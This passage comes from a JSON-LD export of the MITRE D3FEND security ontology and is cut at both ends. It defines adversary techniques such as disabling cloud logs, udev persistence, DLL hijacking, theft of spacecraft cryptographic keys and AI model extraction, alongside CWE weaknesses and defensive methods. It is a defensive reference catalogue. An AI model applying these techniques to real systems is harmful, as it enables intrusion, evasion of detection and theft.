      "d3f:definition": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)",
      "rdfs:label": "Execution Guardrails - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Execution Guardrails"
    },
    {
      "@id": "d3f:ExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to run malicious code.",
      "d3f:enables": {
        "@id": "d3f:TA0002"
      },
      "rdfs:label": "Execution Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N5fd11afbdc174683b786e06d5ce65bb2"
        }
      ]
    },
    {
      "@id": "_:N5fd11afbdc174683b786e06d5ce65bb2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0002"
      }
    },
    {
      "@id": "d3f:CWE-681",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-681",
      "d3f:definition": "When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.",
      "rdfs:label": "Incorrect Conversion between Numeric Types",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-704"
      }
    },
    {
      "@id": "d3f:WebSocketURL",
      "@type": [
        "owl:NamedIndividual",
        "d3f:URL"
      ],
      "rdfs:label": "Web Socket URL"
    },
    {
      "@id": "d3f:K-CenterClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KCC",
      "d3f:definition": "K-center Clustering is a type of clustering based on an combinatorial optimization methods.  It clusters a set of points so as to minimize the maximum intercluster distance.",
      "d3f:kb-article": "## How it works\n\nAn example K-center Clustering problem is to mimimize the number of points in a set that are necessary so that a every other point in the set is within some fixed distance of those points.  For instance, given n cities with specified distances, one wants to build k warehouses in different cities and minimize the maximum distance of a city to a warehouse.\n\n## Considerations\n\n- **Scalability**: Exact solutions are NP-hard.  However, algorithms\n    that have been proven effective and create no more than 2x the\n    optimal set of clusters can run in O(kn) proportional to k*n where\n    k is the minimum number of clusters and n is the number of data\n    points being clustered.\n\n## Key Test Considerations\n\n- **Unsupervised Learning**:\n\n  - **Number of Clusters**: The Gonzalez (Gon) algorithm guarantees\n      creating no more than twice the optimal number of clusters,\n      where the optimal number is the minimum number of clusters to\n      minimize total distance between representative points in the\n      clusters [1].\n\n- **Cluster Analysis**:\n\n    - **Rand Index and Adjusted Rand Index**: Given ground truth set\n      of class labels for the data, the Rand Index is a measure of the\n      similarity between two data clusterings. The Rand Index is the\n      accuracy of determining if a link belongs within a cluster or\n      not. 
A form of the Rand Index may be defined that is adjusted\n      for the chance grouping of elements; this is the Adjusted Rand\n      Index [5].\n\n    - **Adjusted Mutual Information**: Given ground truth set of class\n      labels for the data, Adjusted Mutual Information corrects the\n      effect of agreement solely due to chance between clusterings,\n      similar to the way the Adjusted Rand Index corrects the Rand\n      Index [6].\n\n- **Connection-based Clustering**:\n\n  - **Choice of Distance Metric**: The outcome can vary significantly depending on the chosen distance metric (e.g., Euclidean, Manhattan).\n\n  - **Sensitivity**: Connection-based methods can be sensitive to outliers, which might affect the quality of the clusters formed.\n\n- **K-center Clustering**:\n\n  - **Silhouette Score**: The silhouette score refers to a scoring\n    method that helps validate the consistency between clusters of\n    data. The evaluation technique also produces a concise graphical\n    representation of how well each object appears to have been\n    classified.  It is suited to K-center Clustering in that it also\n    works for different metric spaces.\n\n  - **Distance Metric**: The distance measure must be a true metric (see\n    [2]).  Differences in the metric chosen (e.g., Euclidean,\n    Manhattan) may affect results significantly.\n\n  - **Sensitivity**: Greedy implementations may be sensitive to\n    outliers.\n\n## Platforms, Tools, or Libraries\n\nN/A. _Note that this algorithm is relatively simple and so it is\nusually implemented from scratch by those incorporating this algorithm\ninto a system._\n\n## References\n\n1. Gonzalez, T.F. (1985). Clustering to Minimize the Maximum Intercluster Distance. Theor. Comput. Sci., 38, 293-306.\n[Link](https://www.sciencedirect.com/science/article/pii/0304397585902245?via%3Dihub).\n\n1. Weisstein, Eric W. (n.d.). \"Metric.\" From MathWorld--A Wolfram Web Resource. 
[Link](https://mathworld.wolfram.com/Metric.html).\n\n1. Wikipedia. (8 Aug 2023). Metric k-center [Link](https://en.wikipedia.org/wiki/Metric_k-center).\n\n1. Wikipedia. (14 Aug 2023). Vertex k-center problem. [Link](https://en.wikipedia.org/wiki/Vertex_k-center_problem).\n\n1. Wikipedia. (n.d.). Rand Index. [Link](https://en.wikipedia.org/wiki/Rand_index).\n\n1. Wikipedia. (n.d.). Adjusted Mutual Information. [Link](https://en.wikipedia.org/wiki/Adjusted_mutual_information).\n\n1. Wikipedia. (1 Aug 2023). Silhouette (clustering). [Link](https://en.wikipedia.org/wiki/Silhouette_(clustering)).",
      "rdfs:label": "K-Center Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Graph-basedClustering"
      }
    },
    {
      "@id": "d3f:T0825",
      "@type": "owl:Class",
      "d3f:attack-id": "T0825",
      "d3f:definition": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Location Identification - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Location Identification"
    },
    {
      "@id": "d3f:ARMA_Model",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TimeSeriesAnalysis"
      ],
      "d3f:d3fend-id": "D3-ARMA",
      "d3f:definition": "Autoregressive-moving-average (ARMA) models provide a parsimonious description of a (weakly) stationary stochastic process in terms of two polynomials, one for the autoregression (AR) and the second for the moving average (MA).",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Autoregressive-moving-average model. [Link](https://en.wikipedia.org/wiki/Autoregressive%E2%80%93moving-average_model)",
      "d3f:synonym": "Autoregressive moving average model",
      "rdfs:label": "ARMA Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeySetSecurityEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the application or modification of access controls or security settings to a registry key.",
      "rdfs:label": "Windows Registry Key Set Security Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:Nfa4612b8fd3d4c70acfe8d37ad0507c5"
        }
      ]
    },
    {
      "@id": "_:Nfa4612b8fd3d4c70acfe8d37ad0507c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:SecurityToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:AccessToken"
      },
      "d3f:definition": "Security tokens are peripheral devices used to prove one's identity electronically (as in the case of a customer trying to access their bank account). The token is used in addition to or in place of a password to prove that the customer is who they claim to be. The token acts like an electronic key to access something.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Security_token"
      },
      "rdfs:label": "Security Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N705ed5f8e594419c89d11a3c875deb6b"
        }
      ]
    },
    {
      "@id": "_:N705ed5f8e594419c89d11a3c875deb6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:T1564.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.009",
      "d3f:definition": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)",
      "d3f:may-create": {
        "@id": "d3f:ResourceFork"
      },
      "d3f:may-modify": {
        "@id": "d3f:ResourceFork"
      },
      "rdfs:label": "Resource Forking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N6dd68be8eb284517826f1df5b01de4f4"
        },
        {
          "@id": "_:N24ca9562c57d4714b72cbadf6ac843fe"
        }
      ]
    },
    {
      "@id": "_:N6dd68be8eb284517826f1df5b01de4f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceFork"
      }
    },
    {
      "@id": "_:N24ca9562c57d4714b72cbadf6ac843fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ResourceFork"
      }
    },
    {
      "@id": "d3f:T1138",
      "@type": "owl:Class",
      "d3f:attack-id": "T1138",
      "d3f:definition": "The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.011",
      "rdfs:label": "Application Shimming",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-754",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-754",
      "d3f:definition": "The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.",
      "rdfs:label": "Improper Check for Unusual or Exceptional Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:CWE-1068",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1068",
      "d3f:definition": "The implementation of the product is not consistent with the design as described within the relevant documentation.",
      "rdfs:label": "Inconsistency Between Implementation and Documented Design",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1059.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.001",
      "d3f:definition": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).",
      "rdfs:label": "PowerShell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:AML.T0024.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.002",
      "d3f:definition": "Adversaries may extract a functional copy of a private model.\nBy repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.\nThe inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.\n\nAdversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting.\nModel extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).",
      "rdfs:label": "Extract AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Extract AI Model"
    },
    {
      "@id": "d3f:CWE-688",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-688",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies the wrong variable or reference as one of the arguments, which may lead to undefined behavior and resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Variable or Reference as Argument",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1562.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.008",
      "d3f:definition": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.",
      "d3f:disables": {
        "@id": "d3f:CloudServiceSensor"
      },
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Disable or Modify Cloud Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nf0f610a1df754f2bae19e6436b0a3ed1"
        },
        {
          "@id": "_:Nf4e126eb7b1a4608a07fb83866f70f39"
        }
      ]
    },
    {
      "@id": "_:Nf0f610a1df754f2bae19e6436b0a3ed1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudServiceSensor"
      }
    },
    {
      "@id": "_:Nf4e126eb7b1a4608a07fb83866f70f39",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-175",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-175",
      "d3f:definition": "The product does not properly handle when the same input uses several different (mixed) encodings.",
      "rdfs:label": "Improper Handling of Mixed Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-172"
      }
    },
    {
      "@id": "d3f:T1038",
      "@type": "owl:Class",
      "d3f:attack-id": "T1038",
      "d3f:definition": "Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.001",
      "rdfs:label": "DLL Search Order Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:RemoteAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits systems without being physically present near the target, often over the internet.",
      "rdfs:label": "Remote Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:Generation",
      "@type": "owl:Class",
      "rdfs:label": "Media Generation",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:RD-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003.02",
      "d3f:definition": "Adversaries seek any cryptographic material that confers command or decryption authority: uplink authentication/MAC keys and counters, link-encryption/session keys and KEKs, loading/transfer keys for HSMs, PN/spreading codes, modem credentials, and station or crosslink keys. Acquisition routes include compromised ground systems and laptops, misconfigured repositories and ticket systems, memory/core dumps, training datasets and screenshots, contractor support channels, and poorly controlled key-loading or recovery procedures. Because some missions authenticate uplink without encrypting it, possession of the right keys/counters may be sufficient to inject accepted commands outside official channels or to desynchronize anti-replay.",
      "rdfs:label": "Cryptographic Keys - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0003"
      },
      "skos:prefLabel": "Cryptographic Keys"
    },
    {
      "@id": "d3f:LinuxProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "Linux Process"
    },
    {
      "@id": "d3f:ProximitySensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A sensor able to detect the presence of nearby objects without any physical contact.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Proximity_sensor"
      },
      "rdfs:label": "Proximity Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "d3f:Sensor"
        }
      ]
    },
    {
      "@id": "d3f:FileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:File"
      },
      "d3f:d3fend-id": "D3-FA",
      "d3f:definition": "File Analysis is an analytic process to determine a file's status. For example: virus, trojan, benign, malicious, trusted, unauthorized, sensitive, etc.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\nSome techniques use file signatures or file metadata to compare against historical collections of malware. Files may also be compared against a source of ground truth such as cryptographic signatures. Examining files for potential malware using pattern matching against file contents/file behavior. Binary code may be dissembled and analyzed for predictive malware behavior, such as API call signatures. Analysis might occur within a protected environment such as a sandbox or live system.",
      "rdfs:label": "File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N1343dc21a4094602a2fe82064c45eaf6"
        },
        {
          "@id": "_:N2f520b3df08140c68a03116fb5fd47a0"
        }
      ]
    },
    {
      "@id": "_:N1343dc21a4094602a2fe82064c45eaf6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N2f520b3df08140c68a03116fb5fd47a0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:CCI-000193_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of lower case characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000193"
    },
    {
      "@id": "d3f:Reference-FirmwareVerificationTrapezoid",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9674183B2/en"
      },
      "d3f:kb-abstract": "A trust control management method for security, operable on a computer system generates a unique Trust ID value by combining user-defined values with hardware-specific values associated with the user's computer system and storing the Trust ID value in a memory register physically associated with the hardware of the computer system.",
      "d3f:kb-author": "Michael J. Dyer, Jose E. Gonzalez, Albert Caballero",
      "d3f:kb-organization": "Trapezoid, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareVerification"
      },
      "d3f:kb-reference-title": "System and method for hardware-based trust control management",
      "rdfs:label": "Reference - Firmware Verification Trapezoid"
    },
    {
      "@id": "d3f:OTAlarmMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Report danger, hazards, or serious errors.",
      "rdfs:label": "OT Alarm Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N11498a6a7ed5457eacb8cd1806170caa"
        }
      ]
    },
    {
      "@id": "_:N11498a6a7ed5457eacb8cd1806170caa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTAlarmMessage"
      }
    },
    {
      "@id": "d3f:T1546.017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.017",
      "d3f:definition": "Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)",
      "rdfs:label": "Udev Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:T1035",
      "@type": "owl:Class",
      "d3f:attack-id": "T1035",
      "d3f:definition": "Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1569.002",
      "rdfs:label": "Service Execution",
      "rdfs:seeAlso": {
        "@id": "d3f:T1569.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-386",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-386",
      "d3f:definition": "A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time.",
      "rdfs:label": "Symbolic Name not Mapping to Correct Object",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:CWE-1089",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1089",
      "d3f:definition": "The product uses a large data table that contains an excessively large number of indices.",
      "rdfs:label": "Large Data Table with Excessive Number of Indices",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CWE-521",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-521",
      "d3f:definition": "The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts.",
      "rdfs:label": "Weak Password Requirements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1391"
      }
    },
    {
      "@id": "d3f:RD-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0003",
      "d3f:definition": "Adversaries acquire ready-made tools, code, and knowledge so they can move faster and with lower attribution when operations begin. Capabilities span commodity malware and loaders, bespoke implants for mission control mission control and ground enclaves, privilege-escalation and lateral-movement kits, SDR/codec stacks for TT&C and payload links, fuzzers and protocol harnesses, exploit chains for RTOS/middleware and ground services, and databases of configuration playbooks from prior intrusions. Actors prefer modular kits that can be re-skinned (new C2, new certs) and exercised in flatsat or SIL/HIL labs before use. They also collect operational “how-tos”, procedures, scripts, and operator macros, that convert technical access into mission effects.",
      "rdfs:label": "Obtain Cyber Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Cyber Capabilities"
    },
    {
      "@id": "d3f:encrypts",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x encrypts y: The entity x converts the ordinary representation of a digital artifact y into a secret code.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00996121-v"
      },
      "rdfs:label": "encrypts",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:Reference-PredictingDomainGenerationAlgorithmsWithLongShort-TermMemoryNetworks_",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://arxiv.org/abs/1611.007911"
      },
      "d3f:kb-abstract": "Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generating a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate---a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results.",
      "d3f:kb-author": "Jonathan Woodbridge, Hyrum S. Anderson, Anjum Ahuja, Daniel Grant",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:DNSTrafficAnalysis"
      },
      "d3f:kb-reference-title": "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks",
      "rdfs:label": "Reference - Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"
    },
    {
      "@id": "d3f:invoked-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x invoked-by y: The entity x is called, triggered, or activated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:invokes"
      },
      "rdfs:label": "invoked-by",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-be-invoked-by"
        }
      ]
    },
    {
      "@id": "d3f:BusMessage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital message potentially containing commands, telemetry, or status signals, encoded in a bus protocol and conveyed over a bus within one or more frames.",
      "rdfs:label": "Bus Message",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMessage"
      }
    },
    {
      "@id": "d3f:CCI-000032_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control using organization-defined security policy filters as a basis for flow control decisions for organization-defined information flows.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000032"
    },
    {
      "@id": "d3f:WebSessionAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:WebSessionAccessMediation"
      ],
      "d3f:d3fend-id": "D3-WSAM",
      "d3f:definition": "Web session access mediation secures user sessions in web applications by employing robust authentication and integrity validation, along with adaptive threat mitigation techniques, to ensure that access to web resources is authorized and protected from session-related attacks.",
      "d3f:isolates": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "d3f:kb-article": "## How it works\n\nWeb Session Access Mediation involves managing user access to web applications and services, ensuring secure and authorized sessions. This includes authenticating users, maintaining session integrity, and protecting against threats like session hijacking. Examples include accessing corporate intranets, SaaS applications, or online portals.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-41-Revision-1"
      },
      "rdfs:label": "Web Session Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "_:N80a179cd0a9f41f68b3c12c87410cd85"
        }
      ]
    },
    {
      "@id": "_:N80a179cd0a9f41f68b3c12c87410cd85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "d3f:PacketLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of all the network packet data captured from a network by a network sensor (i.e., packet analyzer),",
      "d3f:records": {
